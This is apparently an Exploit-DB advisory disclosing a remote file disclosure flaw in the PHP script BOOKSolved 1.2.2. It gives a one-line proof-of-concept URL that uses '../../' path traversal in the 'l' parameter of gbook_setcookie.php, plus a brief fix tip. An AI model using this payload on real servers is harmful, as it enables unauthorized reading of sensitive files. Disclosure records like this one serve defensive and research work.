BOOKSolved 1.2.2 - Remote File Disclosure

Author: bd0rk
type: webapps
platform: php
port: 
date_added: 2011-10-08  
date_updated: 2011-10-08  
verified: 0  
codes: OSVDB-83480  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.combooksolved_v1.2.2.zip  

raw file: 17943.txt  
...BOOKSolved 1.2.2 (l) Remote File Disclosure Vulnerability

...Discovered by bd0rk

...Contact: bd0rk[at]hackermail.com or follow me on twitter

...Greetz: inj3ct0r-Team, x0r_32, Perle, Siber King

...Tested on: Ubuntu-Linux

...MEZ-Time: 08:17

...Vendor: http://www.usolved.net/

...Download: http://www.usolved.net/scripts/booksolved_v1.2.2.zip

----------------------------------------------------------------------------

PoC: http://[targethost]/[path]/inc/gbook_setcookie.php?l=../../R3adIn.php

----------------------------------------------------------------------------

Description: Found vulnerable code in gbook_setcookie.php line 7.
             So an attacker can read in sensitive files about l-parameter.


bd0rk's-Fixtip: Percolate the l-parameter before $_GET



Greetings from Germany, the 22 years old bd0rk.